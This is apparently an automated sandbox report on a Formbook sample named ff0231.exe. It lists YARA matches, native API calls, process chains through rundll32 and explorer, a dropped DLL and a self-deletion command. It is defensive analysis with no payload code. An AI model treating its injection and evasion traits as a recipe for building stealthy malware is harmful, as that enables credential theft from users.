Source: 00000003.00000000.674213587.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.674213587.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 0_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_00406043
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_00404618
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_0040681A
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_100010E0
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_1000E22C
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_1000C0A4
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_1000D311
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_1000BB32
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_1000B5C0
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_100071DD
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00401030
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00402D90
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_0041D593
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00409E4D
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00409E50
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_0041E783
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00402FB0
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A820A8
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009CB090
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E20A0
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A828EC
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A8E824
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71002
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DA830
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BF900
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009D4120
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A822AE
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A6FA2B
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EEBB0
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7DBD2
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A703DA
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A82B28
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DAB40
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C841F
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7D466
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E2581
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A825DD
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009CD5E0
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A82D07
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B0D20
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A81D55
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A82EF7
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009D6E30
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7D616
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A81FF1
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A8DFCE
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_00401030
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_00402D90
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_0041D593
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_00409E4D
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_00409E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500F900
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D2D07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05000D20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05024120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D1D55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05032581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D25DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0501D5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050C1002
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0501841F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050CD466
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0501B090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050320A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D20A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D28EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D2B28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503EBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050CDBD2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D1FF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05026E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D22AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D2EF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00D82D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00D9D593
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00D89E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00D89E4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00D9E783
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00D82FB0

Source: C:\Users\user\Desktop\ff0231.exe	Code function: String function: 0041C1D0 appears 38 times
Source: C:\Users\user\Desktop\ff0231.exe	Code function: String function: 009BB150 appears 54 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0500B150 appears 35 times

Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_0041A350 NtCreateFile,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_0041A400 NtReadFile,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_0041A480 NtClose,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_0041A530 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_0041A3FC NtReadFile,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009FB040 NtSuspendThread,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9A10 NtQuerySection,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009FA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009FAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9560 NtWriteFile,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F96D0 NtCreateKey,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009FA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009FA770 NtOpenThread,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F9760 NtOpenProcess,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_0041A350 NtCreateFile,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_0041A400 NtReadFile,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_0041A480 NtClose,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_0041A530 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_0041A3FC NtReadFile,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050499A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050495D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050496D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050496E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0504AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049560 NtWriteFile,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050499D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050495F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0504B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050498A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050498F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0504A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049760 NtOpenProcess,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0504A770 NtOpenThread,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050497A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0504A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049A10 NtQuerySection,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049A20 NtResumeThread,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05049A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00D9A350 NtCreateFile,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00D9A480 NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00D9A400 NtReadFile,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00D9A530 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00D9A3FC NtReadFile,

Source: ff0231.exe, 00000000.00000003.671678874.0000000002A76000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ff0231.exe
Source: ff0231.exe, 00000000.00000003.671897973.0000000002C0F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ff0231.exe
Source: ff0231.exe, 00000003.00000002.731312035.0000000000AAF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ff0231.exe
Source: ff0231.exe, 00000003.00000002.731697388.0000000000D99000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs ff0231.exe
Source: ff0231.exe, 00000003.00000002.731474525.0000000000C3F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ff0231.exe

Source: ff0231.exe

Virustotal: Detection: 33%

Source: C:\Users\user\Desktop\ff0231.exe

File read: C:\Users\user\Desktop\ff0231.exe

Jump to behavior

Source: ff0231.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ff0231.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\ff0231.exe "C:\Users\user\Desktop\ff0231.exe"
Source: C:\Users\user\Desktop\ff0231.exe	Process created: C:\Users\user\Desktop\ff0231.exe "C:\Users\user\Desktop\ff0231.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ff0231.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\Desktop\ff0231.exe	Process created: C:\Users\user\Desktop\ff0231.exe "C:\Users\user\Desktop\ff0231.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ff0231.exe"

Source: C:\Users\user\Desktop\ff0231.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000019.db

Jump to behavior

Source: C:\Users\user\Desktop\ff0231.exe

File created: C:\Users\user\AppData\Local\Temp\nstCF7B.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/2@7/5

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,

Source: C:\Users\user\Desktop\ff0231.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 0_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\explorer.exe

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: wntdll.pdbUGP source: ff0231.exe, 00000000.00000003.671729748.0000000002AF0000.00000004.00000001.sdmp, ff0231.exe, 00000000.00000003.672459058.0000000002960000.00000004.00000001.sdmp, ff0231.exe, 00000003.00000002.731062351.0000000000990000.00000040.00000001.sdmp, ff0231.exe, 00000003.00000002.731312035.0000000000AAF000.00000040.00000001.sdmp, rundll32.exe, 00000009.00000002.1196453197.00000000050FF000.00000040.00000001.sdmp, rundll32.exe, 00000009.00000002.1196239529.0000000004FE0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: ff0231.exe, ff0231.exe, 00000003.00000002.731062351.0000000000990000.00000040.00000001.sdmp, ff0231.exe, 00000003.00000002.731312035.0000000000AAF000.00000040.00000001.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.1196453197.00000000050FF000.00000040.00000001.sdmp, rundll32.exe, 00000009.00000002.1196239529.0000000004FE0000.00000040.00000001.sdmp
Source:	Binary string: rundll32.pdb source: ff0231.exe, 00000003.00000002.731688712.0000000000D90000.00000040.00020000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: ff0231.exe, 00000003.00000002.731688712.0000000000D90000.00000040.00020000.sdmp

Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_10009595 push ecx; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_0041704C push ecx; retf
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00417029 push ecx; retf
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00416944 push ecx; iretd
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_0041C228 push es; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_0040E3EA push esi; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00409B99 push edx; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00409B99 push edx; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_0041D4F2 push eax; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_0041D4FB push eax; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_004164FF push ss; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_0041D4A5 push eax; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_0041D55C push eax; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_004176B5 pushfd ; iretd
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00416FDB push ecx; retf
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00416FE0 push ecx; retf
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A0D0D1 push ecx; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_0041704C push ecx; retf
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_00417029 push ecx; retf
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_00416944 push ecx; iretd
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_0041C228 push es; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_0040E3EA push esi; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_00409B99 push edx; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_00409B99 push edx; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_0041D4F2 push eax; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_0041D4FB push eax; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_004164FF push ss; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_0041D4A5 push eax; ret
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_1_0041D55C push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0505D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00D9704C push ecx; retf

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Source: C:\Users\user\Desktop\ff0231.exe

File created: C:\Users\user\AppData\Local\Temp\nsoCFAB.tmp\xavjqrgsngv.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: /c del "C:\Users\user\Desktop\ff0231.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: /c del "C:\Users\user\Desktop\ff0231.exe"

Source: C:\Windows\explorer.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\ff0231.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
